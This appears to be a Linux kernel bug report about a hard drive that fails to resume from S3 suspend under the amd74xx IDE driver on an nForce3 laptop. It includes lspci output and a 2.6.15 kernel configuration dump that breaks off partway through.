    <t xml:space="preserve">The harddrive doesn't wake up from S3 sleep when using the amd74xx ide driver. When the generic ide driver is used, S3 sleep/suspend works fine, but this driver doesn't support dma. # lspci 00:00.0 Host bridge: nVidia Corporation nForce3 Host Bridge (rev a4) 00:01.0 ISA bridge: nVidia Corporation nForce3 LPC Bridge (rev a6) 00:01.1 SMBus: nVidia Corporation nForce3 SMBus (rev a4) 00:02.0 USB Controller: nVidia Corporation nForce3 USB 1.1 (rev a5) 00:02.1 USB Controller: nVidia Corporation nForce3 USB 1.1 (rev a5) 00:02.2 USB Controller: nVidia Corporation nForce3 USB 2.0 (rev a2) 00:06.0 Multimedia audio controller: nVidia Corporation nForce3 Audio (rev a2) 00:06.1 Modem: nVidia Corporation Unknown device 00d9 (rev a2) 00:08.0 IDE interface: nVidia Corporation nForce3 IDE (rev a5) 00:0a.0 PCI bridge: nVidia Corporation nForce3 PCI Bridge (rev a2) 00:0b.0 PCI bridge: nVidia Corporation nForce3 AGP Bridge (rev a4) 00:18.0 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] HyperTransport Technology Configuration 00:18.1 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Address Map 00:18.2 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] DRAM Controller 00:18.3 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Miscellaneous Control 01:00.0 VGA compatible controller: nVidia Corporation NV17 [GeForce4 420 Go 32M] (rev a3) 02:00.0 FireWire (IEEE 1394): Texas Instruments TSB43AB21 IEEE-1394a-2000 Controller (PHY/Link) 02:01.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) 02:02.0 Network controller: Broadcom Corporation BCM4306 802.11b/g Wireless LAN Controller (rev 03) 02:04.0 CardBus bridge: Texas Instruments PCI1620 PC Card Controller (rev 01) 02:04.1 CardBus bridge: Texas Instruments PCI1620 PC Card Controller (rev 01) 02:04.2 System peripheral: Texas Instruments PCI1620 Firmware Loading Function (rev 01) cat .config # # Automatically generated make config: don't edit # Linux kernel version: 2.6.15 # Wed Jan 11 14:28:25 2006 # CONFIG_X86_64=y CONFIG_64BIT=y CONFIG_X86=y CONFIG_SEMAPHORE_SLEEPERS=y CONFIG_MMU=y CONFIG_RWSEM_GENERIC_SPINLOCK=y CONFIG_GENERIC_CALIBRATE_DELAY=y CONFIG_X86_CMPXCHG=y CONFIG_EARLY_PRINTK=y CONFIG_GENERIC_ISA_DMA=y CONFIG_GENERIC_IOMAP=y CONFIG_ARCH_MAY_HAVE_PC_FDC=y # # Code maturity level options # CONFIG_EXPERIMENTAL=y CONFIG_CLEAN_COMPILE=y CONFIG_BROKEN_ON_SMP=y CONFIG_LOCK_KERNEL=y CONFIG_INIT_ENV_ARG_LIMIT=32 # # General setup # CONFIG_LOCALVERSION="" # CONFIG_LOCALVERSION_AUTO is not set CONFIG_SWAP=y CONFIG_SYSVIPC=y CONFIG_POSIX_MQUEUE=y CONFIG_BSD_PROCESS_ACCT=y # CONFIG_BSD_PROCESS_ACCT_V3 is not set CONFIG_SYSCTL=y CONFIG_AUDIT=y CONFIG_AUDITSYSCALL=y CONFIG_HOTPLUG=y CONFIG_KOBJECT_UEVENT=y CONFIG_IKCONFIG=y CONFIG_IKCONFIG_PROC=y CONFIG_INITRAMFS_SOURCE="" CONFIG_CC_OPTIMIZE_FOR_SIZE=y # CONFIG_EMBEDDED is not set CONFIG_KALLSYMS=y # CONFIG_KALLSYMS_ALL is not set # CONFIG_KALLSYMS_EXTRA_PASS is not set CONFIG_PRINTK=y CONFIG_BUG=y CONFIG_BASE_FULL=y CONFIG_FUTEX=y CONFIG_EPOLL=y CONFIG_SHMEM=y CONFIG_CC_ALIGN_FUNCTIONS=0 CONFIG_CC_ALIGN_LABELS=0 CONFIG_CC_ALIGN_LOOPS=0 CONFIG_CC_ALIGN_JUMPS=0 # CONFIG_TINY_SHMEM is not set CONFIG_BASE_SMALL=0 # # Loadable module support # CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y CONFIG_MODULE_FORCE_UNLOAD=y CONFIG_OBSOLETE_MODPARM=y # CONFIG_MODVERSIONS is not set CONFIG_MODULE_SRCVERSION_ALL=y CONFIG_KMOD=y # # Block layer # # CONFIG_LBD is not set # # IO Schedulers # CONFIG_IOSCHED_NOOP=y CONFIG_IOSCHED_AS=m CONFIG_IOSCHED_DEADLINE=m CONFIG_IOSCHED_CFQ=y # CONFIG_DEFAULT_AS is not set # CONFIG_DEFAULT_DEADLINE is not set CONFIG_DEFAULT_CFQ=y # CONFIG_DEFAULT_NOOP is not set CONFIG_DEFAULT_IOSCHED="cfq" # # Processor type and features # CONFIG_MK8=y # CONFIG_MPSC is not set # CONFIG_GENERIC_CPU is not set CONFIG_X86_L1_CACHE_BYTES=64 CONFIG_X86_L1_CACHE_SHIFT=6 CONFIG_X86_TSC=y CONFIG_X86_GOOD_APIC=y CONFIG_MICROCODE=m CONFIG_X86_MSR=m CONFIG_X86_CPUID=m CONFIG_X86_IO_APIC=y CONFIG_X86_LOCAL_APIC=y CONFIG_MTRR=y # CONFIG_SMP is not set # CONFIG_PREEMPT_NONE is not set # CONFIG_PREEMPT_VOLUNTARY is not set CONFIG_PREEMPT=y CONFIG_PREEMPT_BKL=y CONFIG_ARCH_FLATMEM_ENABLE=y CONFIG_SELECT_MEMORY_MODEL=y CONFIG_FLATMEM_MANUAL=y # CONFIG_DISCONTIGMEM_MANUAL is not set # CONFIG_SPARSEMEM_MANUAL is not set CONFIG_FLATMEM=y CONFIG_FLAT_NODE_MEM_MAP=y # CONFIG_SPARSEMEM_STATIC is not set CONFIG_SPLIT_PTLOCK_CPUS=4 CONFIG_HAVE_ARCH_EARLY_PFN_TO_NID=y CONFIG_HPET_TIMER=y CONFIG_X86_PM_TIMER=y CONFIG_GART_IOMMU=y CONFIG_SWIOTLB=y CONFIG_X86_MCE=y # CONFIG_X86_MCE_INTEL is not set CONFIG_X86_MCE_AMD=y CONFIG_PHYSICAL_START=0x100000 # CONFIG_KEXEC is not set CONFIG_SECCOMP=y # CONFIG_HZ_100 is not set CONFIG_HZ_250=y # CONFIG_HZ_1000 is not set CONFIG_HZ=250 CONFIG_GENERIC_HARDIRQS=y CONFIG_GENERIC_IRQ_PROBE=y CONFIG_ISA_DMA_API=y # # Power management options # CONFIG_PM=y CONFIG_PM_LEGACY=y # CONFIG_PM_DEBUG is not set CONFIG_SOFTWARE_SUSPEND=y CONFIG_PM_STD_PARTITION="" # # ACPI (Advanced Configuration and Power Interface) Support # CONFIG_ACPI=y CONFIG_ACPI_SLEEP=y CONFIG_ACPI_SLEEP_PROC_FS=y CONFIG_ACPI_SLEEP_PROC_SLEEP=y CONFIG_ACPI_AC=m CONFIG_ACPI_BATTERY=m CONFIG_ACPI_BUTTON=m CONFIG_ACPI_VIDEO=m CONFIG_ACPI_HOTKEY=m CONFIG_ACPI_FAN=m CONFIG_ACPI_PROCESSOR=m CONFIG_ACPI_THERMAL=m # CONFIG_ACPI_ASUS is not set # CONFIG_ACPI_IBM is not set # CONFIG_ACPI_TOSHIBA is not set CONFIG_ACPI_BLACKLIST_YEAR=0 # CONFIG_ACPI_DEBUG is not set CONFIG_ACPI_EC=y CONFIG_ACPI_POWER=y CONFIG_ACPI_SYSTEM=y # CONFIG_ACPI_CONTAINER is not set # # CPU Frequency scaling # CONFIG_CPU_FREQ=y CONFIG_CPU_FREQ_TABLE=m # CONFIG_CPU_FREQ_DEBUG is not set CONFIG_CPU_FREQ_STAT=m CONFIG_CPU_FREQ_STAT_DETAILS=y # CONFIG_CPU_FREQ_DEFAULT_GOV_PERFORMANCE is not set CONFIG_CPU_FREQ_DEFAULT_GOV_USERSPACE=y CONFIG_CPU_FREQ_GOV_PERFORMANCE=m CONFIG_CPU_FREQ_GOV_POWERSAVE=m CONFIG_CPU_FREQ_GOV_USERSPACE=y CONFIG_CPU_FREQ_GOV_ONDEMAND=m CONFIG_CPU_FREQ_GOV_CONSERVATIVE=m # # CPUFreq processor drivers # CONFIG_X86_POWERNOW_K8=m CONFIG_X86_POWERNOW_K8_ACPI=y # CONFIG_X86_SPEEDSTEP_CENTRINO is not set CONFIG_X86_ACPI_CPUFREQ=m # # shared options # CONFIG_X86_ACPI_CPUFREQ_PROC_INTF=y # CONFIG_X86_SPEEDSTEP_LIB is not set # # Bus options (PCI etc.) # CONFIG_PCI=y CONFIG_PCI_DIRECT=y CONFIG_PCI_MMCONFIG=y # CONFIG_UNORDERED_IO is not set # CONFIG_PCIEPORTBUS is not set # CONFIG_PCI_MSI is not set CONFIG_PCI_LEGACY_PROC=y # CONFIG_PCI_DEBUG is not set # # PCCARD (PCMCIA/CardBus) support # CONFIG_PCCARD=m # CONFIG_PCMCIA_DEBUG is not set CONFIG_PCMCIA=m # CONFIG_PCMCIA_LOAD_CIS is not set CONFIG_PCMCIA_IOCTL=y CONFIG_CARDBUS=y # # PC-card bridges # CONFIG_YENTA=m # CONFIG_PD6729 is not set # CONFIG_I82092 is not set CONFIG_PCCARD_NONSTATIC=m # # PCI Hotplug Support # # CONFIG_HOTPLUG_PCI is not set # # Executable file formats / Emulations # CONFIG_BINFMT_ELF=y CONFIG_BINFMT_MISC=m CONFIG_IA32_EMULATION=y CONFIG_IA32_AOUT=y CONFIG_COMPAT=y CONFIG_SYSVIPC_COMPAT=y CONFIG_UID16=y # # Networking # CONFIG_NET=y # # Networking options # CONFIG_PACKET=m # CONFIG_PACKET_MMAP is not set CONFIG_UNIX=y CONFIG_XFRM=y CONFIG_XFRM_USER=m CONFIG_NET_KEY=m CONFIG_INET=y # CONFIG_IP_MULTICAST is not set # CONFIG_IP_ADVANCED_ROUTER is not set CONFIG_IP_FIB_HASH=y # CONFIG_IP_PNP is not set # CONFIG_NET_IPIP is not set # CONFIG_NET_IPGRE is not set # CONFIG_ARPD is not set # CONFIG_SYN_COOKIES is not set # CONFIG_INET_AH is not set # CONFIG_INET_ESP is not set # CONFIG_INET_IPCOMP is not set # CONFIG_INET_TUNNEL is not set CONFIG_INET_DIAG=y CONFIG_INET_TCP_DIAG=y # CONFIG_TCP_CONG_ADVANCED is not set CONFIG_TCP_CONG_BIC=y # CONFIG_IPV6 is not set # CONFIG_NETFILTER is not set # # DCCP Configuration (EXPERIMENTAL) # # CONFIG_IP_DCCP is not set # # SCTP Configuration (EXPERIMENTAL) # # CONFIG_IP_SCTP is not set # CONFIG_ATM is not set # CONFIG_BRIDGE is not set # CONFIG_VLAN_8021Q is not set # CONFIG_DECNET is not set # CONFIG_LLC2 is not set # CONFIG_IPX is not set # CONFIG_ATALK is not set # CONFIG_X25 is not set # CONFIG_LAPB is not set # CONFIG_NET_DIVERT is not set # CONFIG_ECONET is not set # CONFIG_WAN_ROUTER is not set # # QoS and/or fair queueing # # CONFIG_NET_SCHED is not set # # Network testing # # CONFIG_NET_PKTGEN is not set # CONFIG_HAMRADIO is not set # CONFIG_IRDA is not set CONFIG_BT=m CONFIG_BT_L2CAP=m CONFIG_BT_SCO=m CONFIG_BT_RFCOMM=m CONFIG_BT_RFCOMM_TTY=y CONFIG_BT_BNEP=m CONFIG_BT_BNEP_MC_FILTER=y CONFIG_BT_BNEP_PROTO_FILTER=y CONFIG_BT_HIDP=m # # Bluetooth device drivers # CONFIG_BT_HCIUSB=m CONFIG_BT_HCIUSB_SCO=y CONFIG_BT_HCIUART=m CONFIG_BT_HCIUART_H4=y CONFIG_BT_HCIUART_BCSP=y CONFIG_BT_HCIBCM203X=m CONFIG_BT_HCIBPA10X=m CONFIG_BT_HCIBFUSB=m # CONFIG_BT_HCIDTL1 is not set # CONFIG_BT_HCIBT3C is not set # CONFIG_BT_HCIBLUECARD is not set # CONFIG_BT_HCIBTUART is not set CONFIG_BT_HCIVHCI=m CONFIG_IEEE80211=m CONFIG_IEEE80211_DEBUG=y CONFIG_IEEE80211_CRYPT_WEP=m CONFIG_IEEE80211_CRYPT_CCMP=m CONFIG_IEEE80211_CRYPT_TKIP=m # # Device Drivers # # # Generic Driver Options # CONFIG_STANDALONE=y CONFIG_PREVENT_FIRMWARE_BUILD=y CONFIG_FW_LOADER=y # CONFIG_DEBUG_DRIVER is not set # # Connector - unified userspace &lt;-&gt; kernelspace linker # # CONFIG_CONNECTOR is not set # # Memory Technology Devices (MTD) # # CONFIG_MTD is not set # # Parallel port support # CONFIG_PARPORT=m CONFIG_PARPORT_PC=m # CONFIG_PARPORT_PC_FIFO is not set # CONFIG_PARPORT_PC_SUPERIO is not set # CONFIG_PARPORT_PC_PCMCIA is not set # CONFIG_PARPORT_GSC is not set CONFIG_PARPORT_1284=y # # Plug and Play support # CONFIG_PNP=y # CONFIG_PNP_DEBUG is not set # # Protocols # # CONFIG_PNPACPI is not set # # Block devices # CONFIG_BLK_DEV_FD=m # CONFIG_PARIDE is not set # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_CPQ_CISS_DA is not set # CONFIG_BLK_DEV_DAC960 is not set # CONFIG_BLK_DEV_UMEM is not set # CONFIG_BLK_DEV_COW_COMMON is not set CONFIG_BLK_DEV_LOOP=m CONFIG_BLK_DEV_CRYPTOLOOP=m CONFIG_BLK_DEV_NBD=m # CONFIG_BLK_DEV_SX8 is not set # CONFIG_BLK_DEV_UB is not set CONFIG_BLK_DEV_RAM=y CONFIG_BLK_DEV_RAM_COUNT=16 CONFIG_BLK_DEV_RAM_SIZE=4096 CONFIG_BLK_DEV_INITRD=y CONFIG_CDROM_PKTCDVD=m CONFIG_CDROM_PKTCDVD_BUFFERS=8 CONFIG_CDROM_PKTCDVD_WCACHE=y # CONFIG_ATA_OVER_ETH is not set # # ATA/ATAPI/MFM/RLL support # CONFIG_IDE=y CONFIG_BLK_DEV_IDE=y # # Please see Documentation/ide.txt for help/info on IDE drives # # CONFIG_BLK_DEV_IDE_SATA is not set # CONFIG_BLK_DEV_HD_IDE is not set CONFIG_BLK_DEV_IDEDISK=y CONFIG_IDEDISK_MULTI_MODE=y CONFIG_BLK_DEV_IDECS=m CONFIG_BLK_DEV_IDECD=m # CONFIG_BLK_DEV_IDETAPE is not set # CONFIG_BLK_DEV_IDEFLOPPY is not set # CONFIG_BLK_DEV_IDESCSI is not set # CONFIG_IDE_TASK_IOCTL is not set # # IDE chipset support/bugfixes # CONFIG_IDE_GENERIC=y # CONFIG_BLK_DEV_CMD640 is not set CONFIG_BLK_DEV_IDEPNP=y CONFIG_BLK_DEV_IDEPCI=y CONFIG_IDEPCI_SHARE_IRQ=y # CONFIG_BLK_DEV_OFFBOARD is not set CONFIG_BLK_DEV_GENERIC=y # CONFIG_BLK_DEV_OPTI621 is not set # CONFIG_BLK_DEV_RZ1000 is not set CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_IDEDMA_FORCED is not set CONFIG_IDEDMA_PCI_AUTO=y # CONFIG_IDEDMA_ONLYDISK is not set # CONFIG_BLK_DEV_AEC62XX is not set # CONFIG_BLK_DEV_ALI15X3 is not set CONFIG_BLK_DEV_AMD74XX=y # CONFIG_BLK_DEV_ATIIXP is not set # CONFIG_BLK_DEV_CMD64X is not set # CONFIG_BLK_DEV_TRIFLEX is not set # CONFIG_BLK_DEV_CY82C693 is not set # CONFIG_BLK_DEV_CS5520 is not set # CONFIG_BLK_DEV_CS5530 is not set # CONFIG_BLK_DEV_HPT34X is not set # CONFIG_BLK_DEV_HPT366 is not set # CONFIG_BLK_DEV_SC1200 is not set # CONFIG_BLK_DEV_PIIX is not set # CONFIG_BLK_DEV_IT821X is not set # CONFIG_BLK_DEV_NS87415 is not set # CONFIG_BLK_DEV_PDC202XX_OLD is not set # CONFIG_BLK_DEV_PDC202XX_NEW is not set # CONFIG_BLK_DEV_SVWKS is not set # CONFIG_BLK_DEV_SIIMAGE is not set # CONFIG_BLK_DEV_SIS5513 is not set # CONFIG_BLK_DEV_SLC90E66 is not set # CONFIG_BLK_DEV_TRM290 is not set # CONFIG_BLK_DEV_VIA82CXXX is not set # CONFIG_IDE_ARM is not set CONFIG_BLK_DEV_IDEDMA=y CONFIG_IDEDMA_IVB=y CONFIG_IDEDMA_AUTO=y # CONFIG_BLK_DEV_HD is not set # # SCSI device support # # CONFIG_RAID_ATTRS is not set CONFIG_SCSI=y # CONFIG_SCSI_PROC_FS is not set # # SCSI support type (disk, tape, CD-ROM) # CONFIG_BLK_DEV_SD=m # CONFIG_CHR_DEV_ST is not set # CONFIG_CHR_DEV_OSST is not set # CONFIG_BLK_DEV_SR is not set CONFIG_CHR_DEV_SG=m # CONFIG_CHR_DEV_SCH is not set # # Some SCSI devices (e.g. CD jukebox) support multiple LUNs # # CONFIG_SCSI_MULTI_LUN is not set # CONFIG_SCSI_CONSTANTS is not set # CONFIG_SCSI_LOGGING is not set # # SCSI Transport Attributes # # CONFIG_SCSI_SPI_ATTRS is not set # CONFIG_SCSI_FC_ATTRS is not set # CONFIG_SCSI_ISCSI_ATTRS is not set # CONFIG_SCSI_SAS_ATTRS is not set # # SCSI low-level drivers # # CONFIG_ISCSI_TCP is not set # CONFIG_BLK_DEV_3W_XXXX_RAID is not set # CONFIG_SCSI_3W_9XXX is not set # CONFIG_SCSI_ACARD is not set # CONFIG_SCSI_AACRAID is not set # CONFIG_SCSI_AIC7XXX is not set # CONFIG_SCSI_AIC7XXX_OLD is not set # CONFIG_SCSI_AIC79XX is not set # CONFIG_MEGARAID_NEWGEN is not set # CONFIG_MEGARAID_LEGACY is not set # CONFIG_MEGARAID_SAS is not set # CONFIG_SCSI_SATA is not set # CONFIG_SCSI_BUSLOGIC is not set # CONFIG_SCSI_DMX3191D is not set # CONFIG_SCSI_EATA is not set # CONFIG_SCSI_FUTURE_DOMAIN is not set # CONFIG_SCSI_GDTH is not set # CONFIG_SCSI_IPS is not set # CONFIG_SCSI_INITIO is not set # CONFIG_SCSI_INIA100 is not set # CONFIG_SCSI_PPA is not set # CONFIG_SCSI_IMM is not set # CONFIG_SCSI_SYM53C8XX_2 is not set # CONFIG_SCSI_IPR is not set # CONFIG_SCSI_QLOGIC_FC is not set # CONFIG_SCSI_QLOGIC_1280 is not set CONFIG_SCSI_QLA2XXX=y # CONFIG_SCSI_QLA21XX is not set # CONFIG_SCSI_QLA22XX is not set # CONFIG_SCSI_QLA2300 is not set # CONFIG_SCSI_QLA2322 is not set # CONFIG_SCSI_QLA6312 is not set # CONFIG_SCSI_QLA24XX is not set # CONFIG_SCSI_LPFC is not set # CONFIG_SCSI_DC395x is not set # CONFIG_SCSI_DC390T is not set # CONFIG_SCSI_DEBUG is not set # # PCMCIA SCSI adapter support # # CONFIG_PCMCIA_FDOMAIN is not set # CONFIG_PCMCIA_QLOGIC is not set # CONFIG_PCMCIA_SYM53C500 is not set # # Multi-device support (RAID and LVM) # # CONFIG_MD is not set # # Fusion MPT device support # # CONFIG_FUSION is not set # CONFIG_FUSION_SPI is not set # CONFIG_FUSION_FC is not set # CONFIG_FUSION_SAS is not set # # IEEE 1394 (FireWire) support # CONFIG_IEEE1394=m # # Subsystem Options # # CONFIG_IEEE1394_VERBOSEDEBUG is not set # CONFIG_IEEE1394_OUI_DB is not set CONFIG_IEEE1394_EXTRA_CONFIG_ROMS=y CONFIG_IEEE1394_CONFIG_ROM_IP1394=y # CONFIG_IEEE1394_EXPORT_FULL_API is not set # # Device Drivers # # CONFIG_IEEE1394_PCILYNX is not set CONFIG_IEEE1394_OHCI1394=m # # Protocol Drivers # CONFIG_IEEE1394_VIDEO1394=m CONFIG_IEEE1394_SBP2=m # CONFIG_IEEE1394_SBP2_PHYS_DMA is not set CONFIG_IEEE1394_ETH1394=m CONFIG_IEEE1394_DV1394=m CONFIG_IEEE1394_RAWIO=m CONFIG_IEEE1394_CMP=m CONFIG_IEEE1394_AMDTP=m # # I2O device support # # CONFIG_I2O is not set # # Network device support # CONFIG_NETDEVICES=y # CONFIG_DUMMY is not set # CONFIG_BONDING is not set # CONFIG_EQUALIZER is not set # CONFIG_TUN is not set # CONFIG_NET_SB1000 is not set # # ARCnet devices # # CONFIG_ARCNET is not set # # PHY device support # # CONFIG_PHYLIB is not set # # Ethernet (10 or 100Mbit) # CONFIG_NET_ETHERNET=y CONFIG_MII=m # CONFIG_HAPPYMEAL is not set # CONFIG_SUNGEM is not set # CONFIG_CASSINI is not set # CONFIG_NET_VENDOR_3COM is not set # # Tulip family network device support # # CONFIG_NET_TULIP is not set # CONFIG_HP100 is not set CONFIG_NET_PCI=y # CONFIG_PCNET32 is not set # CONFIG_AMD8111_ETH is not set # CONFIG_ADAPTEC_STARFIRE is not set # CONFIG_B44 is not set CONFIG_FORCEDETH=m # CONFIG_DGRS is not set # CONFIG_EEPRO100 is not set # CONFIG_E100 is not set # CONFIG_FEALNX is not set # CONFIG_NATSEMI is not set # CONFIG_NE2K_PCI is not set # CONFIG_8139CP is not set CONFIG_8139TOO=m # CONFIG_8139TOO_PIO is not set CONFIG_8139TOO_TUNE_TWISTER=y # CONFIG_8139TOO_8129 is not set # CONFIG_8139_OLD_RX_RESET is not set # CONFIG_SIS900 is not set # CONFIG_EPIC100 is not set # CONFIG_SUNDANCE is not set # CONFIG_VIA_RHINE is not set # CONFIG_NET_POCKET is not set # # Ethernet (1000 Mbit) # # CONFIG_ACENIC is not set # CONFIG_DL2K is not set # CONFIG_E1000 is not set # CONFIG_NS83820 is not set # CONFIG_HAMACHI is not set # CONFIG_YELLOWFIN is not set # CONFIG_R8169 is not set # CONFIG_SIS190 is not set # CONFIG_SKGE is not set # CONFIG_SK98LIN is not set # CONFIG_VIA_VELOCITY is not set # CONFIG_TIGON3 is not set # CONFIG_BNX2 is not set # # Ethernet (10000 Mbit) # # CONFIG_CHELSIO_T1 is not set # CONFIG_IXGB is not set # CONFIG_S2IO is not set # # Token Ring devices # # CONFIG_TR is not set # # Wireless LAN (non-hamradio) # CONFIG_NET_RADIO=y # # Obsolete Wireless cards support (pre-802.11) # # CONFIG_STRIP is not set # CONFIG_PCMCIA_WAVELAN is not set # CONFIG_PCMCIA_NETWAVE is not set # # Wireless 802.11 Frequency Hopping cards support # # CONFIG_PCMCIA_RAYCS is not set # # Wireless 802.11b ISA/PCI cards support # # CONFIG_IPW2100 is not set # CONFIG_IPW2200 is not set # CONFIG_AIRO is not set # CONFIG_HERMES is not set # CONFIG_ATMEL is not set # # Wireless 802.11b Pcmcia/Cardbus cards support # # CONFIG_AIRO_CS is not set # CONFIG_PCMCIA_WL3501 is not set # # Prism GT/Duette 802.11(a/b/g) PCI/Cardbus support # # CONFIG_PRISM54 is not set # CONFIG_HOSTAP is not set CONFIG_NET_WIRELESS=y # # PCMCIA network device support # # CONFIG_NET_PCMCIA is not set # # Wan interfaces # # CONFIG_WAN is not set # CONFIG_FDDI is not set # CONFIG_HIPPI is not set # CONFIG_PLIP is not set CONFIG_PPP=m # CONFIG_PPP_MULTILINK is not set # CONFIG_PPP_FILTER is not set CONFIG_PPP_ASYNC=m CONFIG_PPP_SYNC_TTY=m CONFIG_PPP_DEFLATE=m CONFIG_PPP_BSDCOMP=m # CONFIG_PPP_MPPE is not set # CONFIG_PPPOE is not set # CONFIG_SLIP is not set # CONFIG_NET_FC is not set # CONFIG_SHAPER is not set # CONFIG_NETCONSOLE is not set # CONFIG_NETPOLL is not set # CONFIG_NET_POLL_CONTROLLER is not set # # ISDN subsystem # # CONFIG_ISDN is not set # # Telephony Support # # CONFIG_PHONE is not set # # Input device support # CONFIG_INPUT=y # # Userland interfaces # CONFIG_INPUT_MOUSEDEV=y # CONFIG_INPUT_MOUSEDEV_PSAUX is not set CONFIG_INPUT_MOUSEDEV_SCREEN_X=1200 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=800 # CONFIG_INPUT_JOYDEV is not set # CONFIG_INPUT_TSDEV is not set CONFIG_INPUT_EVDEV=y CONFIG_INPUT_EVBUG=m # # Input Device Drivers # CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y # CONFIG_KEYBOARD_SUNKBD is not set # CONFIG_KEYBOARD_LKKBD is not set # CONFIG_KEYBOARD_XTKBD is not set # CONFIG_KEYBOARD_NEWTON is not set CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=y # CONFIG_MOUSE_SERIAL is not set # CONFIG_MOUSE_VSXXXAA is not set # CONFIG_INPUT_JOYSTICK is not set # CONFIG_INPUT_TOUCHSCREEN is not set CONFIG_INPUT_MISC=y CONFIG_INPUT_PCSPKR=m CONFIG_INPUT_UINPUT=m # # Hardware I/O ports # CONFIG_SERIO=y CONFIG_SERIO_I8042=y # CONFIG_SERIO_SERPORT is not set # CONFIG_SERIO_CT82C710 is not set # CONFIG_SERIO_PARKBD is not set # CONFIG_SERIO_PCIPS2 is not set CONFIG_SERIO_LIBPS2=y # CONFIG_SERIO_RAW is not set # CONFIG_GAMEPORT is not set # # Character devices # CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y # CONFIG_SERIAL_NONSTANDARD is not set # # Serial drivers # # CONFIG_SERIAL_8250 is not set # # Non-8250 serial port support # # CONFIG_SERIAL_JSM is not set CONFIG_UNIX98_PTYS=y # CONFIG_LEGACY_PTYS is not set CONFIG_PRINTER=m CONFIG_LP_CONSOLE=y # CONFIG_PPDEV is not set # CONFIG_TIPAR is not set # # IPMI # # CONFIG_IPMI_HANDLER is not set # # Watchdog Cards # # CONFIG_WATCHDOG is not set CONFIG_HW_RANDOM=m CONFIG_NVRAM=m CONFIG_RTC=m CONFIG_GEN_RTC=m CONFIG_GEN_RTC_X=y # CONFIG_DTLK is not set # CONFIG_R3964 is not set # CONFIG_APPLICOM is not set # # Ftape, the floppy tape device driver # # CONFIG_FTAPE is not set CONFIG_AGP=y CONFIG_AGP_AMD64=y # CONFIG_AGP_INTEL is not set CONFIG_DRM=m # CONFIG_DRM_TDFX is not set # CONFIG_DRM_R128 is not set # CONFIG_DRM_RADEON is not set # CONFIG_DRM_MGA is not set # CONFIG_DRM_SIS is not set # CONFIG_DRM_VIA is not set # CONFIG_DRM_SAVAGE is not set # # PCMCIA character devices # # CONFIG_SYNCLINK_CS is not set # CONFIG_CARDMAN_4000 is not set # CONFIG_CARDMAN_4040 is not set # CONFIG_MWAVE is not set CONFIG_RAW_DRIVER=m CONFIG_MAX_RAW_DEVS=256 CONFIG_HPET=y CONFIG_HPET_RTC_IRQ=y CONFIG_HPET_MMAP=y CONFIG_HANGCHECK_TIMER=m # # TPM devices # # CONFIG_TCG_TPM is not set # CONFIG_TELCLOCK is not set # # I2C support # CONFIG_I2C=y CONFIG_I2C_CHARDEV=m # # I2C Algorithms # CONFIG_I2C_ALGOBIT=y CONFIG_I2C_ALGOPCF=m CONFIG_I2C_ALGOPCA=m # # I2C Hardware Bus support # # CONFIG_I2C_ALI1535 is not set # CONFIG_I2C_ALI1563 is not set # CONFIG_I2C_ALI15X3 is not set CONFIG_I2C_AMD756=m # CONFIG_I2C_AMD756_S4882 is not set # CONFIG_I2C_AMD8111 is not set # CONFIG_I2C_I801 is not set # CONFIG_I2C_I810 is not set # CONFIG_I2C_PIIX4 is not set CONFIG_I2C_NFORCE2=m # CONFIG_I2C_PARPORT is not set # CONFIG_I2C_PARPORT_LIGHT is not set # CONFIG_I2C_PROSAVAGE is not set # CONFIG_I2C_SAVAGE4 is not set # CONFIG_SCx200_ACB is not set # CONFIG_I2C_SIS5595 is not set # CONFIG_I2C_SIS630 is not set # CONFIG_I2C_SIS96X is not set # CONFIG_I2C_STUB is not set # CONFIG_I2C_VIA is not set # CONFIG_I2C_VIAPRO is not set # CONFIG_I2C_VOODOO3 is not set # CONFIG_I2C_PCA_ISA is not set # # Miscellaneous I2C Chip support # # CONFIG_SENSORS_DS1337 is not set # CONFIG_SENSORS_DS1374 is not set # CONFIG_SENSORS_EEPROM is not set # CONFIG_SENSORS_PCF8574 is not set # CONFIG_SENSORS_PCA9539 is not set # CONFIG_SENSORS_PCF8591 is not set # CONFIG_SENSORS_RTC8564 is not set # CONFIG_SENSORS_MAX6875 is not set # CONFIG_RTC_X1205_I2C is not set # CONFIG_I2C_DEBUG_CORE is not set # CONFIG_I2C_DEBUG_ALGO is not set # CONFIG_I2C_DEBUG_BUS is not set # CONFIG_I2C_DEBUG_CHIP is not set # # Dallas's 1-wire bus # # CONFIG_W1 is not set # # Hardware Monitoring support # CONFIG_HWMON=m # CONFIG_HWMON_VID is not set # CONFIG_SENSORS_ADM1021 is not set # CONFIG_SENSORS_ADM1025 is not set # CONFIG_SENSORS_ADM1026 is not set # CONFIG_SENSORS_ADM1031 is not set # CONFIG_SENSORS_ADM9240 is not set # CONFIG_SENSORS_ASB100 is not set # CONFIG_SENSORS_ATXP1 is not set # CONFIG_SENSORS_DS1621 is not set # CONFIG_SENSORS_FSCHER is not set # CONFIG_SENSORS_FSCPOS is not set # CONFIG_SENSORS_GL518SM is not set # CONFIG_SENSORS_GL520SM is not set # CONFIG_SENSORS_IT87 is not set # CONFIG_SENSORS_LM63 is not set # CONFIG_SENSORS_LM75 is not set # CONFIG_SENSORS_LM77 is not set # CONFIG_SENSORS_LM78 is not set # CONFIG_SENSORS_LM80 is not set # CONFIG_SENSORS_LM83 is not set # CONFIG_SENSORS_LM85 is not set # CONFIG_SENSORS_LM87 is not set # CONFIG_SENSORS_LM90 is not set # CONFIG_SENSORS_LM92 is not set # CONFIG_SENSORS_MAX1619 is not set # CONFIG_SENSORS_PC87360 is not set # CONFIG_SENSORS_SIS5595 is not set # CONFIG_SENSORS_SMSC47M1 is not set # CONFIG_SENSORS_SMSC47B397 is not set # CONFIG_SENSORS_VIA686A is not set # CONFIG_SENSORS_W83781D is not set # CONFIG_SENSORS_W83792D is not 